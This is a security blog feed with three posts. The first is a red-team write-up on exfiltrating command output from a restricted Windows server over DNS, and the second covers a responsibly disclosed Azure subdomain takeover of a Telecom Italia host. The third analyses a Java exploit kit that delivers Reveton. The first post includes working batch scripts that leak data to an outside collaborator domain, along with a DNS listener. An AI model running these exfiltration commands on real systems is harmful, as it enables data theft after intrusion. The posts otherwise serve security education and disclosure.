tag:blogger.com,1999:blog-34238288463074613332024-03-18T10:48:51.098+01:00Security Obscurity BlogWeb application security and Red Teaming stuffSecurity Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.comBlogger27125tag:blogger.com,1999:blog-3423828846307461333.post-5400087798065407672022-05-16T12:05:00.003+02:002023-01-04T16:07:54.546+01:00Exfiltrating data from a restricted Windows environment using DNS<p style="text-align: justify;">This post aims to show you how i was able to perfom an initial reconnaissance within the operating system without the need to rely on other tools such as PowerShell, certutil or Living Off The Land (LOLBIN) binaries.</p><p>Scenario: </p><p></p><ul style="text-align: left;"><li>Java Web Application vulnerable to a blind Remote Command Execution</li><li>Egress filtering rules allowing only DNS protocol</li><li>Operating System Windows Server 2003</li></ul><p></p><p style="text-align: justify;">After having found the vulnerability, the initial commands that i needed were "whoami" and "cd". So, the idea was to save the output of a command within a file and prepend its content to the burp collaborator domain name and perform a DNS query to get its output as subdomain.</p><p style="text-align: center;"><b>nslookup [OUTPUT COMMAND].</b><span style="text-align: left;"><b>agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net</b></span></p><p>For example:</p>
<pre><code class="language-plaintext">whoami>myfile
set /p v1= <tmpfile
cmd /v /c "echo nslookup %v1%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net"
</code></pre>
<p>The oneliner</p>
<pre><code class="language-plaintext">whoami > tmpfile && set /p v1= < tmpfile && cmd /v /c "echo nslookup %v1%.collaborator.burp.com"</code></pre>
<p style="text-align: justify;">This actually worked but when you encounter characters like \ or spaces that are not allowed into an URL, the DNS query will fail. A workaround was to create an encoding scheme to map the disallowed (reserved) characters to allowed ones and once received the DNS query decode it back. </p><p style="text-align: justify;"><a href="https://datatracker.ietf.org/doc/html/rfc3986#page-12" target="_blank">RFC 3986</a> states that these characters are reserved and cannot be used, so they must be encoded.</p><ul style="text-align: left;"><li>/ -> ZA </li><li>\ -> ZB</li><li>space -> ZC</li><li>ZF -> new line</li></ul><p></p><p style="text-align: justify;">Again, the idea is to save the output of a command inside a file, load its content to a variable and map reserved characters with my encoding scheme. This cannot be done using one line because the variable is not updated, so i need to save the code into a file.</p>
<pre><code class="language-plaintext">@echo off
set /p v1=<tmpfile
set v2=%v1::=ZA%
set v2=%v2: =ZB%
set v2=%v2:\=ZC%
nslookup %v2%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net
</code></pre>
<p style="text-align: justify;">It works, but what about commands that outputs multiple lines, like dir. In this case i ended up using the for loop and, for each line perform a DNS query. EnableDelayedExpansion variable is needed, otherwise the v1 variable will not be updated after the fist set.</p><pre><code class="language-plaintext">@echo off
Setlocal EnableDelayedExpansion
FOR /f "tokens=*" %%G IN ('dir /b %1') DO (
set "v1=%%G"
set "v1=!v1::=ZA!"
set "v1=!v1:/=ZB!"
set "v1=!v1:\=ZC!"
set "v1=!v1: =ZD!"
nslookup -type=A -timeout=0 !v1!.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net
)
</code></pre>
<p>To upload this file on the remote machine i've echoed each line echo "@echo off" >> upfile.bat" and once finished, execute it along with a folder that you need to see the content.</p>
<pre><code class="language-plaintext">upfile.bat C:\</code></pre>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibJbNc3dLf2uC6ijpPfnoBFJUFomNM0XlNad46pVWFfmFEkZgl8Yvb2YTia--C68DoFtdOttCl7Jj0lPVNa1kx-BX_nqn97nqfikjHJNvUKFOPvhyrDrw7nSnSKvfZ-66mLCwLJlBeSsKxwvG4olnLLSv4wn9yMZ_kAxHX3x-yM1Q7l3YBYwAp74fn/s571/Burp_Collaborator_client.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="571" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibJbNc3dLf2uC6ijpPfnoBFJUFomNM0XlNad46pVWFfmFEkZgl8Yvb2YTia--C68DoFtdOttCl7Jj0lPVNa1kx-BX_nqn97nqfikjHJNvUKFOPvhyrDrw7nSnSKvfZ-66mLCwLJlBeSsKxwvG4olnLLSv4wn9yMZ_kAxHX3x-yM1Q7l3YBYwAp74fn/w491-h288/Burp_Collaborator_client.jpg" width="491" /></a></div><p>To be able to automate the process i've set up my own authoritative DNS server. I was using an EC2 instance on Amazon Web Services, so i bought a short domain name because this will allow to add more data within the URL.</p><p>Configuration steps:</p><p></p><ol style="text-align: left;"><li>Route 53 > Hosted Zones > mydomain.com </li><li>Create an A record for your domain ad add the IP address of the server instanc</li><li>Create a NS record with a TTL to 0 so will not be cached by the remote host</li></ol><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcRjkm9ypufsMQ68IKwsb2wx1IVZ1Sr36t5vh92Qgk0PXP3QwwkDs8QHb6JVwRoQyGCnNoGoQP7xA2qtG-vR5aBhn3dvbykVLPDFnr5B3MG7b-k_4pFm6Rm9vjGa_DNv3d8fsMPSnqHdQWcxTQYHUcqkTWMrSokp5qduTUNPlvx8m0GQqS9qqcXl3K/s650/aws_ns_record.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="372" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcRjkm9ypufsMQ68IKwsb2wx1IVZ1Sr36t5vh92Qgk0PXP3QwwkDs8QHb6JVwRoQyGCnNoGoQP7xA2qtG-vR5aBhn3dvbykVLPDFnr5B3MG7b-k_4pFm6Rm9vjGa_DNv3d8fsMPSnqHdQWcxTQYHUcqkTWMrSokp5qduTUNPlvx8m0GQqS9qqcXl3K/w263-h460/aws_ns_record.jpg" width="263" /></a></div><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgpZU_rm0sL_924zJrrCSaP9ZJT2R45KJnW9BUDbPnTF3pnL093H9A_kjdBEHH01VdLxIBP4PJ1UxOvEn4NJrK_obSsphtDDvrz3E15CIdcg4HucoD8Ou0qs5EdfC_Z6b5ziT_0MHC8X2p_5yCoFwmW5yUOrPX0_6HznYKv2ZKsqSo2oEuzFS4al-QI" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="388" data-original-width="1240" height="223" src="https://blogger.googleusercontent.com/img/a/AVvXsEgpZU_rm0sL_924zJrrCSaP9ZJT2R45KJnW9BUDbPnTF3pnL093H9A_kjdBEHH01VdLxIBP4PJ1UxOvEn4NJrK_obSsphtDDvrz3E15CIdcg4HucoD8Ou0qs5EdfC_Z6b5ziT_0MHC8X2p_5yCoFwmW5yUOrPX0_6HznYKv2ZKsqSo2oEuzFS4al-QI=w713-h223" width="713" /></a></div><p>Now, if on the EC2 instance i listen for DNS queries with tcpdump, performing a DNS query i should see a DNS request to TEST subdomain. </p>
<pre><code class="language-plaintext">nslookup -type=A TEST.sub.mydomain.com</code></pre>
<p style="text-align: justify;">To automate the whole process i've created i simple python script that leverages scapy libraries to listen on port UDP 53 for DNS queries and decode the subdomain used as a payload.</p><pre><code class="language-python">#!/usr/bin/python3
#
# pip3 install scapy
# script must be run as root
#
from scapy.all import *
net_interface = "eth0"
packet_filter = " and ".join([
"udp dst port 53",
"udp[10] & 0x80 = 0"
# "src host 1.1.1.1 # if you want to filter source ip address
])
# characters map
char_map = {
"ZA": ":",
"ZB": "/",
"ZC": "\\",
"ZD": " ",
"ZE": "\n",
"ZF": "",
}
def map_character(query_encoded):
#query_decoded = query_encoded
for key in char_map:
if key in query_encoded:
query_encoded = query_encoded.replace(key, char_map[key] )
return query_encoded
content = []
def dns_callback(packet):
# parse DNS packet
qname = str( packet[DNS].qd.qname.decode('utf-8') )
qname_dec = map_character( qname ).replace(".sub.mydomain.com.","") # remember the trailing dot
# put it inside a dict
if qname_dec not in content:
content.append(qname_dec)
print( qname_dec )
sniff(filter=packet_filter, prn=dns_callback, store=0,iface=net_interface)
</code></pre>
<p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCIXx0R5e9yzjBYkC_0oCAL4yPy1I4PUQyRw81hLuZevjFmZgrBrQMuwYRTiE5gnA6DUXUIdn6F925QtrPrLWxfnaJULQAhTVAZM5jLVEDUkMq0XnxezcPFV_IVMqI6YmOIfTQpX9jYyeGHVb1SBtPBatnwZ2Qocbsq321fbbnLDL84hWVoVGVKPo/s919/dnsdecoder.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="172" data-original-width="919" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCIXx0R5e9yzjBYkC_0oCAL4yPy1I4PUQyRw81hLuZevjFmZgrBrQMuwYRTiE5gnA6DUXUIdn6F925QtrPrLWxfnaJULQAhTVAZM5jLVEDUkMq0XnxezcPFV_IVMqI6YmOIfTQpX9jYyeGHVb1SBtPBatnwZ2Qocbsq321fbbnLDL84hWVoVGVKPo/w717-h133/dnsdecoder.jpg" width="717" /></a></p><br /><p></p><p style="text-align: justify;">This initial <span style="text-align: justify;">reconnaissance </span>allowed me to exploit another vulnerability (arbitrary file upload ) to move the uploaded file to the directory used by the webserver.</p><p style="text-align: justify;">This technique is intended to be used just for the initial recon phases. The next step should be the download of some C2 implant or thanks to the gathered information exploit other web application vulnerabilities.</p><p>References:</p><p></p><ul style="text-align: left;"><li><a href="https://tools.ietf.org/html/rfc3986#page-12">https://tools.ietf.org/html/rfc3986#page-12</a></li><li><a href="https://www.dostips.com/DtTipsStringManipulation.php">https://www.dostips.com/DtTipsStringManipulation.php</a></li><li><a href="https://ss64.com/nt/delayedexpansion.html">https://ss64.com/nt/delayedexpansion.html</a></li><li><a href="https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/">https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/</a></li><li><a href="https://jasonmurray.org/posts/2020/scapydns/">https://jasonmurray.org/posts/2020/scapydns/</a></li></ul><p></p>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-40360692679787400482020-11-24T21:49:00.002+01:002020-11-26T21:57:13.704+01:00Telecom Italia (TIM) - Azure subdomain takeover<p style="text-align: justify;">Subdomain takeover is a known technique being popular in the latest years with the advent of the cloud providers. At the end of April i was able to takeover timcafe.tim.it subdomain which belongs to Telecom Italia network. </p><h4 style="text-align: justify;">What is subdomain takeover ? </h4><p style="text-align: justify;">Basically, subdomain takeover is the process of hijacking someone else subdomain. Let’s make an example. When a company hosts a websit<span style="background-color: white;">e<span> in the</span> </span>cloud let's say contoso.com hosts a web application on a cloud provider, they create a cloud application which has an unique DNS name, for example myapp.cloudprovider.com.</p><p style="text-align: justify;">Then, contoso.com wants to reach the web application from one of its subdomains, so they create a Canonical Name Record (CNAME) record on their DNS servers for myapp.contoso.com that maps one domain name (an alias) to another (the canonical name). In this case myapp.contoso.com is mapped to myapp.cloudprovider.com.</p><p style="text-align: justify;">Now if you resolv the domain name, this will be the output:</p><div style="text-align: center;"> myapp.contoso.com CNAME <span style="text-align: justify;">myapp.cloudprovider.com</span></div><p style="text-align: center;"><span style="text-align: justify;">myapp.cloudprovider.com A 1.1.1.1</span></p><p style="text-align: justify;">After some time, Contoso company decides to remove the web application from the cloud provider, so they delete the instance but they do not update their DNS servers records. Here comes the subdomain takeover process, because since the cloud app is deleted, anyone can create another cloud app with the same name and hijack Constoso subdomain. So, when someone visits myapp.contoso.com the web application will be always webapp.cloudprovider.com but now it's under someone else's control.</p><p style="text-align: justify;">An in depth explaination can be found at the follwing links:</p><p style="text-align: justify;"></p><ul><li><a href="https://0xpatrik.com/subdomain-takeover-basics/">Subdomain Takeover: Basics</a></li><li><a href="https://www.hackerone.com/blog/Guide-Subdomain-Takeovers">A Guide To Subdomain Takeovers</a><br /></li><li><a href="https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/">Hostile Subdomain Takeover using Heroku/Github/Desk + more</a><br /></li></ul><p></p><h4 style="text-align: justify;">Long story short</h4><p style="text-align: justify;">Since Telecom Italia have a responsible disclosure program i decided to check if one of tim.it subdomains were vulnerable, so after an enumeration phase i used subjack, which identified that timcafe.tim.it could be vulnerable to hijacking.</p><p style="text-align: justify;">Looking at the DNS record with dig highlighted that the subdomain returned a CNAME record pointing to an Azure web application timcafe.azurewebsite.net that wasn't registered anymore. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-k8ANN5CTpy0/X7o4UWH1MgI/AAAAAAAAA90/EORhSVP48UoqWCQ0eFzA4U24pOrIC6y3QCLcBGAsYHQ/s405/nslookup_timcafe_azurewebsite.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="119" data-original-width="405" height="126" src="https://1.bp.blogspot.com/-k8ANN5CTpy0/X7o4UWH1MgI/AAAAAAAAA90/EORhSVP48UoqWCQ0eFzA4U24pOrIC6y3QCLcBGAsYHQ/w429-h126/nslookup_timcafe_azurewebsite.png" width="429" /></a></div><p style="text-align: justify;">Since Microsoft Azure allows anyone with a valid account to create a web application, i've created a new web application named timcafe and after that timcafe.tim.it DNS record will point to the application that i've just created.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-LDSH0kUP8xQ/X7qUy2mLz3I/AAAAAAAAA-A/ndZ06P5TU4gTkD2U_mJYK7Jwa71itY8pACLcBGAsYHQ/s744/create_web_application_edited.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="744" height="606" src="https://1.bp.blogspot.com/-LDSH0kUP8xQ/X7qUy2mLz3I/AAAAAAAAA-A/ndZ06P5TU4gTkD2U_mJYK7Jwa71itY8pACLcBGAsYHQ/w640-h606/create_web_application_edited.png" width="640" /></a></div><div><br /></div><span style="text-align: justify;"><div style="text-align: justify;"><span>Oh, that was easy. Hold on, because if you visit the website a nice "HTTP 404 website not found" message will appear. </span><span>That happens because after resolving the DNS name, the client performs an HTTP GET request to 52.173.149.254 with a HTTP Host header set to timcafe.tim.it and the Azure webserver doesn't know with which web application is mapped, so it returns an error.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">To fix this error, you need to go on "App Service > Settings > Custom domains" and add a custom domain as show in the screenshot below, that maps the incoming name with the web application.</div></span><div style="text-align: justify;"><br /></div><div><div class="separator" style="clear: both; text-align: left;"><a href="https://1.bp.blogspot.com/-iCPakEnCVuI/X7quvTdenFI/AAAAAAAAA-g/P9-HrBIzqLs0qL35otZb_vG6VLejNoMbACLcBGAsYHQ/s1286/azure_custom_domain.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="1286" height="409" src="https://1.bp.blogspot.com/-iCPakEnCVuI/X7quvTdenFI/AAAAAAAAA-g/P9-HrBIzqLs0qL35otZb_vG6VLejNoMbACLcBGAsYHQ/w829-h409/azure_custom_domain.png" width="829" /></a></div><div><br /></div><div><p style="text-align: justify;">After that, timcafe.tim.it shows the content that i've uploaded to my instace.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-auZSzcCHH-M/X7qfOa_gflI/AAAAAAAAA-M/BNPRSZKyj60cgZIgYRXlqGtM4WONbXdOwCLcBGAsYHQ/s644/2020-04-26_16_36_43-Microsoft_Edge.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="644" height="178" src="https://1.bp.blogspot.com/-auZSzcCHH-M/X7qfOa_gflI/AAAAAAAAA-M/BNPRSZKyj60cgZIgYRXlqGtM4WONbXdOwCLcBGAsYHQ/w516-h178/2020-04-26_16_36_43-Microsoft_Edge.png" width="516" /></a></div><h4 style="text-align: justify;">Now what ? </h4><div>Okay, cool, now i've complete control over a subdomain. What can i do next ? Here is a list of potential attacks that could be performed: </div><div><ul style="text-align: left;"><li>Steal all cookies with *.tim.it scope from users browser set without Secure flag;</li><li>Check if timcafe.tim.it subdomain is still referenced from another domain. For example, if tim.it loads a JavaScript file from timcafe.tim.it, it is possible to upload a script and potentially execute arbitrary JavaScript code to tim.it visitors;</li><li>Perform cross domain request to API endpoints which use cookies to keep track of user session;</li><li>Upload a self-signed SSL certificate and if a user accepts browser warnings, steal also cookies set with the Secure flag.</li><li>Phishing and spread malware in behalf of telecom italia;</li><li>Bypass Content-Security-Policy (CSP).</li></ul></div><div>After hijacking the subdomain i've contacted TIM through their responsible disclosure program to inform them about the misconfiguration and after two days the issue was fixed.</div></div></div><div><br /></div><div>Useful links:</div><div><ul style="text-align: left;"><li><a href="https://github.com/haccer/subjack">Subjack</a></li><li><a href="https://github.com/EdOverflow/can-i-take-over-xyz">Can i takeover XYZ ?</a></li></ul></div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-37802270222157502202013-07-25T12:49:00.017+02:002020-11-21T23:45:20.650+01:00Styxy Cool Exploit Kit: One Applet to Exploit All Vulnerabilities<div style="text-align: justify;">Styxy Cool Exploit Kit is a particular kit because it is a "merge" between Cool and Styxy Exploit Kit. Here we are going to cover only Java related exploits so, if you want to know what vulnerabilities it has and why its called Styxy Cool go check Kafeine's post <a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">here</a>.</div>
<br />
Between the eight and nine of July two interesting things happened:<br />
<ol>
<li>Jar size increased from 5Kb to 28 Kb</li>
<li>Payload (Reveton) disappeared from fiddler </li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-NUwuZ_fVYBg/Ue13zzGbVjI/AAAAAAAAAqI/YMIay1vCEUQ/s1600/difference_fiddler_resized.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NUwuZ_fVYBg/Ue13zzGbVjI/AAAAAAAAAqI/YMIay1vCEUQ/s1600/difference_fiddler_resized.jpg" /></a>
</div>
<br />
<br /><br /><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Let's take a step back and analyze the exploit chain from the eight of July.</div><div><div><br /></div></div><div>
The first page <b>/abortion-success_conductor.php </b>displays a bounch of phrases about Yahoo France, but what really does is checking if you have some vulnerable Java plugin installed in your browser.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-4zqc9-ORozU/Ue2Z0WhUqSI/AAAAAAAAAqY/zWAWAVpjkBg/s1600/yahoo_landing.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://2.bp.blogspot.com/-4zqc9-ORozU/Ue2Z0WhUqSI/AAAAAAAAAqY/zWAWAVpjkBg/w320-h432/yahoo_landing.JPG" width="320" /></a></div>
<br />
The page contains an instance of PluginDetect version 0.8 plus an obfuscated JavaScript code.</div><div><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RvEQM3XVb-o/Ue2ao_J-qmI/AAAAAAAAAqk/g4y2UVkJGHQ/s1600/plugindetect.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RvEQM3XVb-o/Ue2ao_J-qmI/AAAAAAAAAqk/g4y2UVkJGHQ/s1600/plugindetect.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-onJjvBGx5uw/Ue2bIamWcII/AAAAAAAAAqs/_RQsqcOvHS0/s1600/obfuscated_js.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-onJjvBGx5uw/Ue2bIamWcII/AAAAAAAAAqs/_RQsqcOvHS0/s1600/obfuscated_js.JPG" /></a></div>
<br />
What does this code do ?<br />
<br />
It takes the content of the textarea from /<b>objection_confident_sulphur.html </b>since in the middle of the first page there is an iframe pointing to that one.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-9gVzy92vVCo/Ue2codNp5GI/AAAAAAAAAq8/lCTidTiaHqI/s1600/second_page_textarea.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-9gVzy92vVCo/Ue2codNp5GI/AAAAAAAAAq8/lCTidTiaHqI/s1600/second_page_textarea.JPG" /></a></div>
<br />
Then converts two chars per time into an integer base 30 and converts the result into a character with the help of String.fromCharCode.<br />
<br />
Once deobfuscated.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wiowEOARz4U/Ue2fWxy-LWI/AAAAAAAAArM/15jJR7U_AYM/s1600/deobfuscated_js.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wiowEOARz4U/Ue2fWxy-LWI/AAAAAAAAArM/15jJR7U_AYM/s1600/deobfuscated_js.JPG" /></a></div>
<br />
If you are vulnerable the next and last page executes the malicious applet. In this case i was using Java SE 7 update 17 so <b>/test_membrane.html</b> contains CVE-2013-2423.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oiJjeCqhqIM/Ue2grI9jiII/AAAAAAAAArc/X7ajFrn4jWo/s1600/applet_jnlp.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-oiJjeCqhqIM/Ue2grI9jiII/AAAAAAAAArc/X7ajFrn4jWo/s1600/applet_jnlp.JPG" /></a></div>
<br />
<div style="text-align: center;">
<b><span style="font-size: large;">Jar size</span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
The size of the applet is increased by 25 Kb because now it contains four Java vulnerabilities and not one as usual.<br />
<br />
If we open the malicious jar with JD-GUI we can see an if/else statement inside the Main.class where it tries several exploits.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XDILbjhtepo/Ue6QGmG-_0I/AAAAAAAAAr8/dkVvv10Mwno/s1600/jar_all_exploit.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-XDILbjhtepo/Ue6QGmG-_0I/AAAAAAAAAr8/dkVvv10Mwno/s1600/jar_all_exploit.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fLwqD7UQC3E/Ue7D8OaGkXI/AAAAAAAAAsc/gbi6akAcjTg/s1600/jar_classes_list_color.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-fLwqD7UQC3E/Ue7D8OaGkXI/AAAAAAAAAsc/gbi6akAcjTg/s1600/jar_classes_list_color.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
If one these successfully set the SecurityManager to null (disabled it), it runs some code inside MainAdd2 class, which is supposed to download and execute Reveton. This new way of using Java vulnerabilities, has certainly an advantage when it comes to obfuscate the code, because you don't have to FUD all four jar but just one.<br /><br />
<div style="text-align: center;">
<b><span style="font-size: large;">Missing Reveton</span></b></div>
<div style="text-align: center;">
<b><br /></b></div>
The other interesting thing is the disappearance of Reveton from fiddler. Below is part of the image from the nine of July posted at the beginning.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-VYZF1_KZaf4/Ue6-iRIn-PI/AAAAAAAAAsM/AuasfoJvyp8/s1600/missing_reveton.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-VYZF1_KZaf4/Ue6-iRIn-PI/AAAAAAAAAsM/AuasfoJvyp8/s1600/missing_reveton.jpg" /></a></div>
<br />
<br /><br /></div><div><br /></div><div><br /></div><div><br /></div><div>As you can see Reveton is never downloaded but you still get infected. </div><div><br /></div><div>Therefore, how the payload is downloaded ?<br />
<br />
My first thought was that it was embedded into the jar, but after a deep search i haven't found any trace. Looking better after the infection, i've noticed an uncommon <b>V.class</b> file inside the Temp folder.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NdmnvBxC9rM/Ue1q8vyszrI/AAAAAAAAApo/i9-oQpwGyEI/s1600/v_class.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-NdmnvBxC9rM/Ue1q8vyszrI/AAAAAAAAApo/i9-oQpwGyEI/s1600/v_class.jpg" /></a></div>
<br />
Part of disassembled V file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-1S855n-4i8c/Ue2jGsQaZiI/AAAAAAAAArs/mBk-XK7si_8/s1600/snip_v_class.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-1S855n-4i8c/Ue2jGsQaZiI/AAAAAAAAArs/mBk-XK7si_8/s1600/snip_v_class.JPG" /></a></div>
<br />
Mistery solved, this java compiled class is responsible of downloading and executing Reveton.<br />
<br />
How this class is executed ?<br />
<br />
At the beginning of the init function <b>useInner </b>variable takes the value of <b>usein </b>applet parameter, but since there isn't any parameter called <b>usein</b>, its value will be null.<br />
<br />
The following line calls <b>dgsdgDG </b>from MainAdd2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-KT5QSFDmY-E/Ue97eJsczVI/AAAAAAAAAtE/LUhCYr9AiUk/s1600/init_start.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KT5QSFDmY-E/Ue97eJsczVI/AAAAAAAAAtE/LUhCYr9AiUk/s1600/init_start.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-0jqYUO9UVJw/Ue7vwVsifzI/AAAAAAAAAss/7TwIhiUE7LM/s1600/parameter_val_not_found.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-0jqYUO9UVJw/Ue7vwVsifzI/AAAAAAAAAss/7TwIhiUE7LM/s1600/parameter_val_not_found.JPG" /></a></div>
<br />
Once again there isn't any parameter called <b>val</b>, so <b>getUrls </b>it's executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-mpMQIH0-c-0/Ue-KEYzZ45I/AAAAAAAAAtk/P5gSE_2CuJk/s1600/geturls.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-mpMQIH0-c-0/Ue-KEYzZ45I/AAAAAAAAAtk/P5gSE_2CuJk/s1600/geturls.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-E7zDbytpbVE/Ue7vz1fjy6I/AAAAAAAAAs0/uhyCc4-V27Y/s1600/get_resource.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-E7zDbytpbVE/Ue7vz1fjy6I/AAAAAAAAAs0/uhyCc4-V27Y/s1600/get_resource.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After obtained the URL of the applet and substituted the extension jar with <b>exe?e=15</b>, a last function called run is executed. Its purpose is to write V.class into Temp folder and call it through the command "<b>javaw -cp <path_tmp_folder> V <reveton_url></b>".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-w3Jh5oLzRhk/Ue9_SGBgjJI/AAAAAAAAAtU/PtxaPvFana8/s1600/run.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-w3Jh5oLzRhk/Ue9_SGBgjJI/AAAAAAAAAtU/PtxaPvFana8/s1600/run.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br /><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>There isn't a lot of code to deobfuscate, but you can find whole V.class <a href="http://pastebin.com/1Ygf0iiS">here</a>. Jar file is available on Kernelmode previous registration: <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=60#p20209">http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=60#p20209</a></div><div>
<br />
Maybe a better title for this post is: One exploit to rule them all, one exploit to exploit them, one exploit to infect them all and in a botnet bind them.<br />
<br />
# Edit 1<br />
Balck Dragon and Blackhole 2.1 have the same behaviour.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aalFXtId8As/Uff_IJ3FWgI/AAAAAAAAAtw/7MDxGSqDZpM/s1600/kafeine_tweet.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-aalFXtId8As/Uff_IJ3FWgI/AAAAAAAAAtw/7MDxGSqDZpM/s1600/kafeine_tweet.jpg" /></a></div>
<br />
Related post:<br />
<ul>
<li><a href="http://security-obscurity.blogspot.com/2013/04/the-latest-java-exploit-with-security.html">The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)</a></li>
<li><a href="http://malwageddon.blogspot.com/2013/07/black-dragon-and-all-will-burn-beneath.html">Black Dragon: "... and all will burn beneath the shadow of my wings"</a></li>
<li><a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">A "Styxy" Cool EK !</a></li>
</ul>
